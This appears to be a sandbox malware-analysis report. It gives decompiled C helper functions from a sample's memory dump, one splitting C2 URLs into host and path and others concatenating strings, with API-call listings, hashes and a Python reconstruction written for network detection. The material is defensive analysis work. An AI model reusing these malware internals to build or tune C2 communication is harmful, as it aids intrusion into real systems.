                                       				void* _t39;
                                       				int _t42;
                                       
                                       				_t17 = __eax;
                                       				_t37 = 0;
                                       				__imp__(_a4, _t33, _t36, _t27, __ecx); // lstrlen(_a4)
                                       				_t2 = _t17 + 1; // 0x1 - buffer size: length plus terminator
                                       				_t28 = _t2;
                                       				_t34 = E00FA550F(_t2); // host buffer (RtlAllocateHeap)
                                       				if(_t34 != 0) {
                                       					_t30 = E00FA550F(_t28); // path buffer (RtlAllocateHeap)
                                       					if(_t30 == 0) {
                                       						E00FAA07B(_t34);
                                       					} else {
                                       						_t39 = _a4;
                                       						_t22 = E00FAA987(_t39); // first '/' or '?' in the string (StrChrA twice)
                                       						_v8 = _t22;
                                       						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                       							_a4 = _t39;
                                       						} else {
                                       							// separator is doubled ("//"): skip both characters, which strips a leading "scheme://"
                                       							_t26 = _t22 + 2;
                                       							_a4 = _t22 + 2;
                                       							_t22 = E00FAA987(_t26); // next '/' or '?' after the host
                                       							_v8 = _t22;
                                       						}
                                       						if(_t22 == 0) {
                                       							__imp__(_t34, _a4); // lstrcpy: no separator left, the remainder is the host
                                       							 *_t30 = 0x2f; // path defaults to "/"
                                       							 *((char*)(_t30 + 1)) = 0;
                                       						} else {
                                       							_t42 = _t22 - _a4; // host length
                                       							memcpy(_t34, _a4, _t42);
                                       							 *((char*)(_t34 + _t42)) = 0;
                                       							__imp__(_t30, _v8); // lstrcpy: path starts at the separator, so "?..." keeps its '?'
                                       						}
                                       						 *_a8 = _t34;
                                       						_t37 = 1;
                                       						 *_a12 = _t30;
                                       					}
                                       				}
                                       				return _t37;
                                       			}

                                       Instruction addresses for the lines above (one per decompiled line; column alignment lost in extraction): 0x00faa586 to 0x00faa634.

                                      APIs
                                      • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00FA9F48,00000000,00000000,00000000,03A49698,?,?,00FAA278,?,03A49698), ref: 00FAA592
                                        • Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B
                                        • Part of subcall function 00FAA987: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00FAA5C0,00000000,00000001,00000001,?,?,00FA9F48,00000000,00000000,00000000,03A49698), ref: 00FAA995
                                        • Part of subcall function 00FAA987: StrChrA.SHLWAPI(?,0000003F,?,?,00FA9F48,00000000,00000000,00000000,03A49698,?,?,00FAA278,?,03A49698,0000EA60,?), ref: 00FAA99F
                                      • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00FA9F48,00000000,00000000,00000000,03A49698,?,?,00FAA278), ref: 00FAA5F0
                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00FAA600
                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00FAA60C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                       • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                      • String ID:
                                      • API String ID: 3767559652-0
                                      • Opcode ID: ec0dcfe4acaf83da11226839b6c777398b4d0534c8c73c40b14c58531ab6bf4c
                                      • Instruction ID: b8d5771c40c0d483d37edefb546cde80c187587a0dbc5509f29ccfd87f73416d
                                      • Opcode Fuzzy Hash: ec0dcfe4acaf83da11226839b6c777398b4d0534c8c73c40b14c58531ab6bf4c
                                      • Instruction Fuzzy Hash: 492175B2904259EFCB11AF64CC44A9F7FA99F0B794F198054F8059B211D735DD08EBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%
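The host/path split in E00FAA586 above is easier to check against candidate C2 URLs in a higher-level reimplementation. The following Python is an added analyst reconstruction, not code from the sample or from the sandbox report. It assumes that the helper E00FAA987 (which calls StrChrA for '/' and then '?') returns whichever separator occurs first, and that the `*_t22 != *(_t22 + 1)` test is a single-byte comparison; the lstrlen and RtlAllocateHeap calls only size the output buffers and are not modelled.

```python
# Added example: analyst reconstruction of the URL split in E00FAA586.
# Not code from the sample. Assumptions: E00FAA987 returns the first '/' or '?',
# and the doubled-separator test in the sample compares single bytes.


def first_separator(s, start=0):
    """Index of the first '/' or '?' in s at or after start, or None.

    Models E00FAA987, which calls StrChrA(s, '/') and StrChrA(s, '?').
    """
    hits = [i for i in (s.find("/", start), s.find("?", start)) if i != -1]
    return min(hits) if hits else None


def split_url(url):
    """Return (host, path) the way E00FAA586 fills *_a8 and *_a12.

    - A leading "scheme://" is skipped only because the first separator found
      is a '/' immediately followed by another '/' (the *_t22 == *(_t22+1) test).
    - If no separator remains, the rest is the host and the path becomes "/".
    - Otherwise the host is everything before the separator and the path is the
      separator plus everything after it, so a "?..." path keeps its '?'.
    """
    start = 0
    sep = first_separator(url, start)
    if sep is not None and sep + 1 < len(url) and url[sep] == url[sep + 1]:
        start = sep + 2                      # skip the doubled separator
        sep = first_separator(url, start)    # search again from the host
    if sep is None:
        return url[start:], "/"              # *_t30 = '/' , *(_t30+1) = 0
    return url[start:sep], url[sep:]         # memcpy host, lstrcpy path


if __name__ == "__main__":
    # Constructed sample inputs, not URLs taken from the sample's configuration.
    for u in ("http://example.com/gate.php?id=1", "example.com", "example.com?x=1"):
        print(u, "->", split_url(u))
```

Running the sample's configured C2 URLs through `split_url` yields the exact host and request-line path strings the sample hands to its HTTP code, which is what a network detection for the beacon should match on.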

                                      C-Code - Quality: 100%
                                       			// Concatenates two wide strings into a freshly allocated buffer; lengths are in WCHARs, sizes in bytes.
                                       			E00FA7502(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                       				void* _v8;
                                       				void* _t18;
                                       				int _t25;
                                       				int _t29;
                                       				int _t34;
                                       
                                       				_t29 = lstrlenW(_a4);
                                       				_t25 = lstrlenW(_a8);
                                       				_t18 = E00FA550F(_t25 + _t29 + _t25 + _t29 + 2); // 2*(len1+len2) + 2 bytes, room for the terminator
                                       				_v8 = _t18;
                                       				if(_t18 != 0) {
                                       					_t34 = _t29 + _t29; // byte length of the first string
                                       					memcpy(_t18, _a4, _t34);
                                       					_t10 = _t25 + 2; // 0x2
                                       					memcpy(_v8 + _t34, _a8, _t25 + _t10); // 2*len2 + 2 bytes: second string including its null terminator
                                       				}
                                       				return _v8;
                                       			}

                                       Instruction addresses for the lines above (one per decompiled line; column alignment lost in extraction): 0x00fa7517 to 0x00fa755b.

                                      APIs
                                      • lstrlenW.KERNEL32(004F0053,73B75520,?,00000008,03A4931C,?,00FA4BA1,004F0053,03A4931C,?,?,?,?,?,?,00FA9CB1), ref: 00FA7512
                                      • lstrlenW.KERNEL32(00FA4BA1,?,00FA4BA1,004F0053,03A4931C,?,?,?,?,?,?,00FA9CB1), ref: 00FA7519
                                        • Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B
                                      • memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,00FA4BA1,004F0053,03A4931C,?,?,?,?,?,?,00FA9CB1), ref: 00FA7539
                                      • memcpy.NTDLL(73B769A0,00FA4BA1,00000002,00000000,004F0053,73B769A0,?,?,00FA4BA1,004F0053,03A4931C), ref: 00FA754C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                       • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: lstrlenmemcpy$AllocateHeap
                                      • String ID:
                                      • API String ID: 2411391700-0
                                      • Opcode ID: ff60f635a6c328546f8fe6f25c0c15267f0462a7c7e625f63831176998d7e4aa
                                      • Instruction ID: 8f139b8730edde251c3bf07579ae9138d02579e106609d6a44bcf8602a8cbbd2
                                      • Opcode Fuzzy Hash: ff60f635a6c328546f8fe6f25c0c15267f0462a7c7e625f63831176998d7e4aa
                                      • Instruction Fuzzy Hash: 9BF0EC76900118BFCB15EFA9CC45C9B7BADEE0A3947154066B908D7111E635EA14DBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlen.KERNEL32(00FA3E46,00000000,00000000,00FA3E46,0053002F,00000000), ref: 00FA9FB0
                                      • lstrlen.KERNEL32(?), ref: 00FA9FB8
                                        • Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B
                                      • lstrcpy.KERNEL32(00000000,?), ref: 00FA9FCF
                                      • lstrcat.KERNEL32(00000000,?), ref: 00FA9FDA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                       • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                      • String ID:
                                      • API String ID: 74227042-0
                                      • Opcode ID: e75bc346d48aa0ca7a354241610a6f8b8b6d1ad45711f5d3ae659c62b3d749c4
                                      • Instruction ID: 3f16759439178f539d66920f73ba76c88ba0d475abdc294bfc357445ef851968
                                      • Opcode Fuzzy Hash: e75bc346d48aa0ca7a354241610a6f8b8b6d1ad45711f5d3ae659c62b3d749c4
                                      • Instruction Fuzzy Hash: 39E04873809625EF87126FA49C08C8FBBA9FFCA760B058915F544D3124CB35D815EBD1
                                      Uniqueness

                                      Uniqueness Score: -1.00%